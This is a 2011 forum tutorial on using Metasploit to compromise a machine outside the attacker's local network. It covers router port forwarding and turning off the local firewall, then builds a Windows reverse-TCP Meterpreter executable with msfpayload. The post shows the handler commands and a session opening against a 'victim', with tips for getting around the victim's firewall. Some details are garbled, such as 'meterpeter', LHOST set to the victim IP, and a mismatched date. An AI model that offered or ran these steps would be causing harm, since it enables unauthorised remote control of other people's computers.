Metasploit attack outside Lan

Started by ghostdog, January 29, 2011, 08:19:37 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

ghostdog

January 29, 2011, 08:19:37 PM Last Edit: January 29, 2011, 08:24:40 PM by ghostdog
Ciao tutti
Hi everyone

Owning a box outside the LAN is not as easy as doing it on LAN, you need to modify a few things as i will show you:

1) we need to port forward a port in your router to be able to get the reverse connection. Port exmpl: 4444
   If you dont know how to forward, go to : www.portforward.com

2) we need to shut down our local firewall :

 ghostdog@Pentest-Lab:~$ sudo su
[sudo] password for ghostdog:
root@Pentest-Lab:/home/ghostdog# ufw disable
Firewall stopped and disabled on system startup

3) Make a new directory called : /pentest/exploits/ , as "root" copy framework3 from /opt into /exploits.

4) we need to modify the payload that we are going to use to attack the remote machine:

root@Pentest-Lab:/home/ghostdog# /pentest/exploits/framework3/msfpayload windows/meterpeter/reverse_tcp LHOST=VICTIM-IP X > /root/incercate.exe Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpeter/reverse_tcp
Length: 290
Options: LHOST=VICTIM-IP
root@Pentest-Lab:/home/ghostdog#

5) we launch the exploit ------>>>>>>

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #


      =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 644 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
      =[ svn r11655 updated yesterday (2011.01.27)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpeter/reverse_tcp
payload ==> windows/meterpeter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.104
LHOST => 192.168.1.104


msf exploit(handler) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf exploit(handler) > exploit

  • Started reverse handler on 192.168.1.104:4444
  • Starting the payload handler...
  • Sending stage (748032) bytes) to VICTIM_IP
  • Meterpeter session l opened (192.168.1.104:4444 -> VICTIM-IP:37244) at SAT Jan 29 18:05:30 +0200 2010
    [/font][/color]


    GAME OVER

    Now a few tips in case this doesn’t work:
    ***Turn off your firewall.
    ***Check if the victims firewall blocks the reverse shell.
    ***Check your router firewall settings.

    PS: Change VICTIME-IP with the Proper IP , expl: 82.218.110.114

    Happy Hacking
    GD ;)
Print
Go Up Pages1
User actions